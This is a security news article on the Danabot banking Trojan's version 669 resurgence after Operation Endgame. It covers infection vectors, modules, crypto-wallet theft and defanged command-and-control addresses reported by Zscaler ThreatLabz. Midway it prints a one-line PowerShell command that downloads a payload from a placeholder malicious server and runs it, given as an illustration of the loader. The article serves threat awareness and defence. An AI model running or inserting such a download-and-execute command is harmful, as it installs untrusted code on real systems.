Danabot, a notorious banking Trojan, has made a significant comeback with its new version 669 after a period of inactivity triggered by Operation Endgame’s law enforcement sweep in May 2025.
This advanced malware’s resurgence signals a new threat wave targeting financial institutions, cryptocurrency users, and individual victims using sophisticated multi-stage attacks.
Danabot tracks a legacy of credential theft, financial fraud, and information exfiltration, its latest evolution marks a technical refinement in both behavioral tactics and infrastructure.
The malware leverages multiple attack vectors to infect systems, including spear-phishing campaigns and malicious documents designed to deliver its payload.
Victims are lured into executing obfuscated attachments using convincing social engineering, which triggers the initial infection.
Once established, Danabot version 669 deploys several modules specializing in data harvesting, lateral movement across networks, and payload delivery tailored for Windows environments.
The malware also targets cryptocurrency wallets, amplifying its reach beyond traditional banking fraud.
Security researchers from Zscaler ThreatLabz identified and analyzed version 669, confirming its revival and exposing its technical underpinnings.
Notably, ThreatLabz documented shifts in Danabot’s command-and-control (C2) infrastructure.
The malware now employs a mix of conventional IP-based C2s and .onion addresses to manage payloads and data exfiltration, ensuring operational resilience and complicating mitigation efforts.
Key C2 addresses include 62.60.226[.]146:443, 62.60.226[.]154:443, and several .onion domains such as aqpfkxxtvahlzr6vobt6fhj4riev7wxzoxwItbcysuybirygxzvp23ad[.]onion:44.
Infection Mechanism Spotlight
At the core of Danabot’s infection process is a robust loader. Once executed, this loader downloads additional encrypted modules and configuration files from multiple C2 servers. The following code snippet represents the initial stage payload deployment:
Invoke-WebRequest -Uri 'http://malicious-server/payload' -OutFile 'C:\Users\Public\payload.exe'; Start-Process 'C:\Users\Public\payload.exe'After establishing a foothold, Danabot injects itself into legitimate Windows processes as a persistence measure and leverages scheduled tasks for continual execution.
The modular design allows the threat actor to remotely manage new payloads and update infection parameters without direct user interaction.
This strategic flexibility, coupled with enhanced detection evasion through encrypted configuration and C2 communications, makes Danabot version 669 a formidable adversary in the current threat landscape.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
